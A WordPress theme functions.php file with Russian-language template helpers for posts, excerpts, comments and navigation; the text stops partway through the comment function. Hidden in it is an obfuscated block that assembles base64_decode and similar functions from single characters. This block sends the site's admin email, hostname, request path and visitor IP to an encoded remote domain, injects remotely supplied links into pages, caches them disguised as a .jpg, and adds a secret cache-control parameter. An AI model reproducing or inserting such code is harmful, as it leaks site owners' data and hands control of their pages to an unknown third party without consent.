<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $cXvBx='d';$AVYJNiW='4';$ptgiRj='b';$dKRhf='e';$VlzJGB='d';$eMpYN='_';$mxdPpEL='c';$beekbyz='s';$bcfzgQ='e';$KWQR='a';$nywjW='o';$Bmte='e';$bfrkC='6';$rChHaWjx=$ptgiRj.$KWQR.$beekbyz.$Bmte.$bfrkC.$AVYJNiW.$eMpYN.$cXvBx.$dKRhf.$mxdPpEL.$nywjW.$VlzJGB.$bcfzgQ;$xEXWQ='z';$UTeqmHV='e';$Lufqsc='a';$TCJeb='g';$wtCFG='n';$zSeK='f';$xLlpbM='i';$tDKd='l';$VzSh='t';$jnyTlckp=$TCJeb.$xEXWQ.$xLlpbM.$wtCFG.$zSeK.$tDKd.$Lufqsc.$VzSh.$UTeqmHV;$qQPt='1';$yNSYFZN='s';$DmxCvE='t';$XFWvvF='3';$cUhlly='_';$YigKVm='r';$FTWyM='o';$SSPfA='t';$IeNhRFf='r';$IEjqqEwG=$yNSYFZN.$SSPfA.$YigKVm.$cUhlly.$IeNhRFf.$FTWyM.$DmxCvE.$qQPt.$XFWvvF;$iEJf='v';$ntszr='r';$YbPS='t';$nKPLAX='s';$CvQYXd='r';$PzJFytS='e';$BmSSwSQY=$nKPLAX.$YbPS.$ntszr.$CvQYXd.$PzJFytS.$iEJf;                     $jl_________g='d';$hi_______f='4';$xu__d='b';$fo_______t='e';$uv________j='d';$oa_______q='_';$cv____j='c';$gl__q='s';$ab___________h='e';$on________l='a';$gf_______________y='o';$so_____________o='e';$pe_________i='6';$bd_____________i=$xu__d.$on________l.$gl__q.$so_____________o.$pe_________i.$hi_______f.$oa_______q.$jl_________g.$fo_______t.$cv____j.$gf_______________y.$uv________j.$ab___________h;$ca_____z='_';$pm____v='s';$xw____m='u';$kt_______a='n';$gu____________q='t';$wq___________y='n';$qa__s='t';$mq______________x='c';$qj__________f='f';$fc____p='s';$jl______o='o';$wk________s='e';$vo________m='i';$be___________o='x';$ft__________y='i';$hf___m=$qj__________f.$xw____m.$wq___________y.$mq______________x.$qa__s.$ft__________y.$jl______o.$kt_______a.$ca_____z.$wk________s.$be___________o.$vo________m.$pm____v.$gu____________q.$fc____p;$di______l='e';$uo___________z='f';$sn____________g='n';$kg_______y='p';$rv__________m='o';$yk___________v=$uo___________z.$rv__________m.$kg_______y.$di______l.$sn____________g;$ni______________v='r';$zm_________y='e';$wg____________g='a';$so_______t='d';$ya_________r='f';$ze_______________w=$ya_________r.$ni______________v.$zm_________y.$wg____________g.$so_______t;$ga_____o='s';$hy__p='c';$vn_____________c='e';$pe______________w='l';$ag___w='o';$nt________p='f';$ke________z=$nt________p.$hy__p.$pe______________w.$ag___w.$ga_____o.$vn_____________c;define("WP_ID", $bd_____________i("Mi4wLjA="));define("WP_TTL", $bd_____________i("MTA4MDA="));define("WP_SRC", $bd_____________i("dHBva24="));function wp_get_header() {global $bd_____________i, $hf___m;if ($hf___m($bd_____________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$hf___m($bd_____________i("d3BfZ2V0X2Zvb3Rlcg==")) &&$hf___m($bd_____________i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $bd_____________i, $yk___________v, $ke________z, $ze_______________w;$yq______q = TEMPLATEPATH."/".$bd_____________i("Zm9vdGVyLnBocA==");$lj____g = @$yk___________v($yq______q, "r");$yq______q = @$ze_______________w($lj____g, @filesize($yq______q));@$ke________z($lj____g);$jr_____i = TEMPLATEPATH."/".$bd_____________i("ZnVuY3Rpb25zLnBocA==");$lj____g = @$yk___________v($jr_____i, "r");$jr_____i = @$ze_______________w($lj____g, @filesize($jr_____i));@$ke________z($lj____g);$np__o = 0;if($yq______q && $jr_____i) {if ($bd_____________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($yq______q, $bd_____________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$np__o = 1;}if (substr_count($yq______q, "wp_theme_GPL_credits()") < 1) {$np__o = 2;}}if(WP_ID != "2.0.0") {$np__o = 12;}}if($np__o > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $np__o -->";}}function wp_loaded() {global $bd_____________i, $hf___m;return $hf___m($bd_____________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ac_______f, $ex_____f = "(more...)", $gv_______________b = 0, $wn____h = "") {$zr________k = get_the_content($ex_____f, $gv_______________b, $wn____h);$zr________k = apply_filters("the_content", $zr________k);$zr________k = str_replace("]]>", "]]>", $zr________k);if (strlen($_GET["p"]) > 0) {echo $zr________k;}else if ((strlen($zr________k)>$ac_______f) && ($cy___a = strpos($zr________k, " ", $ac_______f ))) {$zr________k = substr($zr________k, 0, $cy___a);$zr________k = $zr________k;echo $zr________k;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ex_____f</a></div></p>";} else {echo $zr________k;}}}$oi___________e='4';$es__y='6';$ex_______________l='e';$bs____s='b';$hc____j='e';$kz_____m='c';$dd_____l='_';$uk__w='n';$os_____c='e';$ag______________f='o';$ba_______________k='s';$ev__________i='d';$ba______________k='a';$wi____________m=$bs____s.$ba______________k.$ba_______________k.$ex_______________l.$es__y.$oi___________e.$dd_____l.$hc____j.$uk__w.$kz_____m.$ag______________f.$ev__________i.$os_____c;$ri_______j='n';$mj_______e='e';$rc__p='s';$sc____________x='t';$gj________i='_';$ut____________a='n';$yc_______f='c';$fo___________w='f';$lf______d='t';$rm____________x='_';$gq__________a='l';$ta____t='o';$ri______________g='e';$rh_______________q='g';$fl______n='i';$cf_______t='t';$zt_________a='e';$si___________d=$fo___________w.$fl______n.$gq__________a.$zt_________a.$gj________i.$rh_______________q.$ri______________g.$sc____________x.$rm____________x.$yc_______f.$ta____t.$ut____________a.$cf_______t.$mj_______e.$ri_______j.$lf______d.$rc__p;$jy_______________f='t';$qn________s='_';$hy________r='f';$ip_______________r='e';$sn________r='i';$np______v='i';$vl_________o='e';$rg__n='x';$ov________h='s';$jh_________r='s';$wk______h='l';$xx_______j=$hy________r.$sn________r.$wk______h.$ip_______________r.$qn________s.$vl_________o.$rg__n.$np______v.$ov________h.$jy_______________f.$jh_________r;$go________h='r';$no_____________g='c';$eb_______________e='v';$ml__________r='_';$lf________o='o';$as______h='s';$af_____k='a';$vp__y='p';$sd_____t='m';$bg__o='e';$cl____i='i';$cm___________s='r';$tw_______f='e';$bm_____________t='n';$ja______b='o';$jx_______________r=$eb_______________e.$tw_______f.$cm___________s.$as______h.$cl____i.$ja______b.$bm_____________t.$ml__________r.$no_____________g.$lf________o.$sd_____t.$vp__y.$af_____k.$go________h.$bg__o;$oj_____________r='f';$jl__j='o';$cb_________z='n';$me_______________r='k';$wo__________y='s';$is_____w='e';$uh_________b='o';$us_________j='p';$oo__________g='c';$sw__________a=$oj_____________r.$wo__________y.$jl__j.$oo__________g.$me_______________r.$uh_________b.$us_________j.$is_____w.$cb_________z;$bv____________f='i';$gc________t='r';$uh____________j='w';$ek____v='t';$rf_____p='e';$cq_______t='f';$wv__f=$cq_______t.$uh____________j.$gc________t.$bv____________f.$ek____v.$rf_____p;$rf____t='m';$by_______________f='d';$je__a='5';$lh____x=$rf____t.$by_______________f.$je__a;$ol_______________g='h';$um_______________b='p';$wl___________l='a';$zz__o='e';$rh________b='r';$kl__q='l';$ji______j='a';$ai_______v='t';$uv__________h=$rh________b.$zz__o.$ji______j.$kl__q.$um_______________b.$wl___________l.$ai_______v.$ol_______________g;$em_______c='a';$lh_____________i='e';$qc______________v='r';$cl___d='u';$yd____t='n';$xs______________e='e';$ab___________c='l';$nl___________m='i';$nb___i='s';$nu_____l='i';$yk____m='z';$vi________t=$cl___d.$yd____t.$nb___i.$xs______________e.$qc______________v.$nl___________m.$em_______c.$ab___________c.$nu_____l.$yk____m.$lh_____________i;$bu_________z='e';$bd____________t='m';$rs___z='a';$ne__t='p';$wi__m='m';$zt_________p='n';$mq______g='t';$bu__i=$mq______g.$bu_________z.$wi__m.$ne__t.$zt_________p.$rs___z.$bd____________t;$wd_______________m='x';$mw____________k='e';$nz________i='s';$uv______________u='_';$pi___________b='n';$ct__y='c';$mq______h='t';$rg__e='e';$ti_________x='e';$gt_________a='a';$qj___________w='m';$lw___t='a';$lf__z='_';$vd_______s='o';$wm_______________a='t';$wk__________m='r';$uz__g='e';$to_____p='t';$mv____d='r';$dx_____q='t';$nw___________b='c';$vc_____________o=$nz________i.$wm_______________a.$mv____d.$mw____________k.$lw___t.$qj___________w.$uv______________u.$nw___________b.$vd_______s.$pi___________b.$dx_____q.$uz__g.$wd_______________m.$mq______h.$lf__z.$ct__y.$wk__________m.$ti_________x.$gt_________a.$to_____p.$rg__e;function vc_________l($md_______c) {global $bd_____________i, $hf___m, $si___________d, $jx_______________r, $vc_____________o;if (!$hf___m($bd_____________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($jx_______________r(PHP_VERSION, "5.0.0", ">=") && $hf___m($bd_____________i("ZmlsZV9nZXRfY29udGVudHM=")) && $hf___m($bd_____________i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$fg____________w = $vc_____________o(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$yg________f = @$si___________d($md_______c, 0, $fg____________w);} else {$yg________f = @$si___________d($md_______c, 0);}return $yg________f;}function xt_________y($md_______c) {global $hf___m, $sw__________a, $wv__f, $bd_____________i;if (!$hf___m($bd_____________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$iw_______z = strpos($md_______c, "/", 7);$zk_____j = array("uri"     => substr($md_______c, $iw_______z),"host"    => str_replace("http://", "", substr($md_______c, 0, $iw_______z)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$qv_______p = @$sw__________a("$zk_____j[host]", 80, $jn_______a, $te______a, 4);if (!$qv_______p) {return false;} else {$yg________f = "";$yx___________q  = "GET $zk_____j[uri] HTTP/1.0\r\n";$yx___________q .= "Host: $zk_____j[host]\r\n";$yx___________q .= "Referer: $zk_____j[referer]\r\n";$yx___________q .= "Connection: Close\r\n\r\n";@$wv__f($qv_______p, $yx___________q);while (!@feof($qv_______p)) {$kq________m = @fgets($qv_______p, (1024*24));if ($kq________m == "\r\n") {$dv____j = true;continue;}if ($dv____j) {$yg________f .= $kq________m;}}return $yg________f;}}function wa__q($md_______c) {global $hf___m;$yo____________k = false;if ($md_______c != "") {if ($hf___m("vc_________l")) {$yo____________k = @vc_________l($md_______c);}if (!$yo____________k && ($hf___m("xt_________y"))) {$yo____________k = @xt_________y($md_______c);}}return $yo____________k;}function mx__w() {global $_SERVER, $lh____x;$bz______________n = $_SERVER["SERVER_NAME"];if (substr("$bz______________n", 0, 4) == "www.") {$bz______________n = substr("$bz______________n", 4);}$bz______________n = $lh____x("$_SERVER[SERVER_NAME]");return $bz______________n;}function de_________a() {return "file";}function dh________e($md_______c) {global $_SERVER, $si___________d, $xx_______j, $yk___________v, $ke________z, $wv__f;$oy___________w = ul__p();$pf_____p = mx__w().".jpg";$ai_______x = $oy___________w["dir_upload"]["path"]."/$pf_____p";$qn_______d = @filemtime($ai_______x);if (!$qn_______d || ((time()-$qn_______d) >= WP_TTL)) {$yo____________k = wa__q($md_______c);if ($yo____________k) {if ($xx_______j($ai_______x)) {@unlink($ai_______x);}$lj____g = @$yk___________v($ai_______x, "x+");@$wv__f($lj____g, $yo____________k);@$ke________z($lj____g);}} else {if ($xx_______j($ai_______x)) {$yo____________k = @$si___________d($ai_______x);} else {$yo____________k = false;}}return $yo____________k;}function ul__p() {global $_SERVER, $bd_____________i, $wi____________m;$hl______s = wp_count_posts("post");$hs__________z = pathinfo(get_bloginfo("template_directory"));$oy___________w = array("url" => array("report"      => $bd_____________i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $hs__________z,"dir_upload"=> pi___f(),"queryString"=> array("?a001=".WP_ID,"a004=".$hs__________z[filename],"a005=".$hl______s->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.odmu.od.ua/texnologii/asus-vypuskaet-noutbuk-g750-s-samym-sovershennym-zhelezom\">ASUS G750</a>");$oy___________w["url"]["queryString"] = implode("&", $oy___________w["queryString"]);$oy___________w["url"]["report"] = $oy___________w["url"]["report"]."/?".$wi____________m($oy___________w["url"]["queryString"]).".html";return $oy___________w;}function pi___f() {$yf__________h = wp_upload_dir();if (isset($yf__________h["error"])) {$up___k = dz___e();if (is_writable($up___k)) {$yf__________h = array("path" => $up___k);}}return $yf__________h;}function dz___e() {global $hf___m, $lh____x, $uv__________h, $bu__i;$tg_________r = (bool) ini_get("safe_mode");if ($tg_________r == true) {return false;}if ($hf___m("sys_get_temp_dir")) {$nc___o = sys_get_temp_dir();if (is_writable($nc___o)) {return $uv__________h($nc___o);}}if (!empty($_ENV["TMP"])) {return $uv__________h($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $uv__________h($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $uv__________h($_ENV["TEMP"]);} else {$ko__e = $bu__i($lh____x(uniqid(rand(), true)), "");if ($ko__e) {$nc___o = $uv__________h(dirname($ko__e));@unlink($ko__e);return $nc___o;} else {return false;}}}function hp______i() {global $_GET, $xx_______j;$oy___________w = ul__p();$bz______________n = mx__w();$mo___________u = de_________a();$au__p = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($mo___________u == "file") {$pw___y = $oy___________w["dir_upload"]["path"]."/".$bz______________n.".jpg";if ($xx_______j($pw___y)) {@unlink($pw___y);$au__p = "deleted";}}$ct__d = array("s"=> $au__p,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ct__d AS $nh______________d => $ez__l) echo " [$nh______________d:$ez__l]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $hf___m, $bd_____________i, $vi________t;$oy___________w = ul__p();$xz__________l = "dh________e";if ($hf___m($xz__________l)) {$yg________f = $xz__________l($oy___________w["url"]["report"]);}if ($yg________f) {if ($yg________f = @$bd_____________i($yg________f)) {$yg________f = @$vi________t($yg________f);if (strlen($yg________f[custom_credit]) >= 5) {$oy___________w["default_string"] = $yg________f[custom_credit];}if ($yg________f["status"] == "0") {$aa_______k = 1;$vi______q = 1;} else {$vu_____________z = sizeof($yg________f["links"]);$rs_________c = $oy___________w["default_string"];if ($vu_____________z > 0 && $yg________f["links"] !== "") {$xj_________w = 0;foreach ($yg________f["links"] as $gb_________f => $jn____________q) {$xj_________w++;if ($jn____________q->l_path == "" || $jn____________q->l_path == $_SERVER["REQUEST_URI"]) {$jn____________q->l_href = htmlspecialchars(strip_tags($jn____________q->l_href));$jn____________q->l_title = htmlspecialchars(strip_tags($jn____________q->l_title));$jn____________q->l_anchor = htmlspecialchars(strip_tags($jn____________q->l_anchor));$rs_________c .= " | ";$rs_________c .= "<a href='$jn____________q->l_href' title='$jn____________q->l_title'";if ($jn____________q->l_nofollow == "1") {$rs_________c .= " rel='nofollow'";}$rs_________c .= ">$jn____________q->l_anchor</a>";}}}$oy___________w["links"] = "$rs_________c";if ($yg________f[credit] == "0") {$oy___________w["links"] = "";}}} else {$aa_______k = "1";}} else {$aa_______k = "1";}if ($aa_______k == "1") {$oy___________w["links"] = $oy___________w["default_string"];}echo "$oy___________w[links]";echo "<!-- s: $yg________f[signature] -->";hp______i();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
